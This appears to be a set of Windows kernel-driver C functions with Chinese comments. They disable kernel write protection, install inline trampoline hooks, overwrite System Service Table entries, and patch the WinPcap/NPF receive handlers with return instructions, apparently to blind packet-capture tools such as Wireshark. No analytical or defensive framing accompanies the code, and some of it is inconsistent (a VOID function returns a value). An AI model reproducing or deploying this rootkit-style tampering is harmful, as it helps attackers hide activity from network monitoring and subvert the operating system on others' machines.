NTSTATUS UndoPatchwsWin7() { NTSTATUS status = STATUS_SUCCESS; /* aa801300 8bff mov edi,edi aa801302 55 push ebp aa801303 8bec mov ebp,esp */ ULONG uRestoreCode = 0x8b55ff8b; if (!g_bAlreadyPatchWS) { kprintf("have not patched ws yet\n"); return status; } if (g_ReceiveNetBufferListsHandler) { WPOFF(); *(PULONG)g_ReceiveNetBufferListsHandler =uRestoreCode; WPON(); } g_bAlreadyPatchWS = FALSE; return status; }
VOID InstallHook ( PHOOK_INFO pHookInfo ) { ULONG_PTR ulTrampoline = 0; unsigned char *pTrampoline = NULL; #ifdef _WIN64 JMP_ABS JmpABS; #else JMP_REL JmpREL; #endif//_WIN64 ULONG ulReplaceLen = 0; if (0 == pHookInfo->pOrigFunction || 0 == pHookInfo->pHookFunction) { return ulTrampoline; } // //加入反汇编引擎,计算替换指令的字节长度。 // ulReplaceLen = CalcReplaceSize (pHookInfo->pOrigFunction); WPOFF(); // //申请一块内存写入ShellCode.保存原始函数更改字节并跳转至原始函数位置 // pTrampoline = (unsigned char *)ExAllocatePool(NonPagedPool,TrampolineLen); RtlFillMemory(pTrampoline, TrampolineLen, 0x90); ulTrampoline = (ULONG_PTR)pTrampoline; memcpy((PCHAR)(ulTrampoline), (PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen); #ifdef _WIN64 JmpABS = MakeAbstractJump (pHookInfo->pOrigFunction + ulReplaceLen); memcpy(((PCHAR)ulTrampoline + ulReplaceLen), (PVOID)(&JmpABS), sizeof(JMP_ABS)); #else JmpREL = MakeRelativeJump (ulTrampoline, pHookInfo->pOrigFunction); memcpy((PCHAR)(ulTrampoline + ulReplaceLen), (PCHAR)(&JmpREL), sizeof(JMP_REL)); #endif//_WIN64 // //处理原始函数地址的内容,JMP到HOOK函数 // RtlFillMemory((PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen, 0x90); #ifdef _WIN64 JmpABS = MakeAbstractJump (pHookInfo->pHookFunction); memcpy((PCHAR)(pHookInfo->pOrigFunction), (PVOID)(&JmpABS), sizeof(JMP_ABS)); #else JmpREL = MakeRelativeJump (pHookInfo->pOrigFunction, pHookInfo->pHookFunction); memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(&JmpREL), sizeof(JMP_REL)); #endif//_WIN64 WPON(); pHookInfo->ulReplaceLen = ulReplaceLen; pHookInfo->pTramFunction = (ULONG_PTR)pTrampoline; }
VOID UnInstallHook ( PHOOK_INFO pHookInfo ) { // //还原替换函数字节 // WPOFF(); memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(pHookInfo->pTramFunction), pHookInfo->ulReplaceLen); WPON(); }
// 恢复HOOK NTSTATUS UnHook(ULONG OldService) { if(!g_Init) { return STATUS_UNSUCCESSFUL; } WPOFF(); // 还原钩子函数 *(PULONG)SERVICE_FUNCTION(OldService) = OldServiceAddressTable[SERVICE_ID(OldService)]; WPON(); return STATUS_SUCCESS; }
NTSTATUS Hook(ULONG OldService, ULONG NewService) { if(!g_Init) { DbgPrint(("ServiceTalbe Not Init.\n")); return STATUS_UNSUCCESSFUL; } WPOFF(); DbgPrint("NewService"); //TRACE("New Service\n"); *(PULONG)SERVICE_FUNCTION(OldService) = NewService; WPON(); return STATUS_SUCCESS; }
NTSTATUS doPatchwsWin7(char *ProName, DWORD dwLen) { NTSTATUS status = STATUS_SUCCESS; ULONG uPatchRet3 = 0xcc001cc2; ULONG uPatchRet5 = 0x900014c2; PDWORD pdwTmp = NULL; DWORD dwTmp = 0; if (g_bAlreadyPatchWS) { return status; } do { g_pNpfProtocolBlockWin7 = (PNDIS_PROTOCOL_BLOCKWin7)GetTargetProtocolBlockWin7(ProName, dwLen); if (g_pNpfProtocolBlockWin7==NULL) { status = STATUS_UNSUCCESSFUL; break; } //只搞版本号为5的 g_PatchwsVersion = g_pNpfProtocolBlockWin7->MajorNdisVersion; if (g_PatchwsVersion<=5) { dwTmp = (DWORD)g_pNpfProtocolBlockWin7; pdwTmp = (PDWORD)(dwTmp+g_ReceiveHandlerOffset); //Get the old recv g_NPFReceiveHandler = (ULONG)*pdwTmp; dwTmp = (DWORD)g_pNpfProtocolBlockWin7; pdwTmp = (PDWORD)(dwTmp+g_ReceivePacketHandlerOffset); //Get the old recvpacket g_NPFReceivePacketHandler = (ULONG)*pdwTmp; if (g_NPFReceivePacketHandler) { WPOFF(); *(PULONG)g_NPFReceivePacketHandler =uPatchRet3; WPON(); } else { if (g_NPFReceiveHandler==0) { kprintf("what??? there is no receive handler for npf??\n"); status = STATUS_UNSUCCESSFUL; break; } WPOFF(); *(PULONG)g_NPFReceiveHandler =uPatchRet3; WPON(); } g_bAlreadyPatchWS = TRUE; break; }////end for只搞版本号为5的 //ndis 6 if (g_PatchwsVersion==6) { dwTmp = (DWORD)g_pNpfProtocolBlockWin7; pdwTmp = (PDWORD)(dwTmp+g_ReceiveNetBufferListsHandlerOffset); //Get the old recvlist g_ReceiveNetBufferListsHandler = *pdwTmp; if (g_ReceiveNetBufferListsHandler) { WPOFF(); *(PULONG)g_ReceiveNetBufferListsHandler =uPatchRet5; WPON(); } else { status = STATUS_UNSUCCESSFUL; } break; } } while (0); return status; }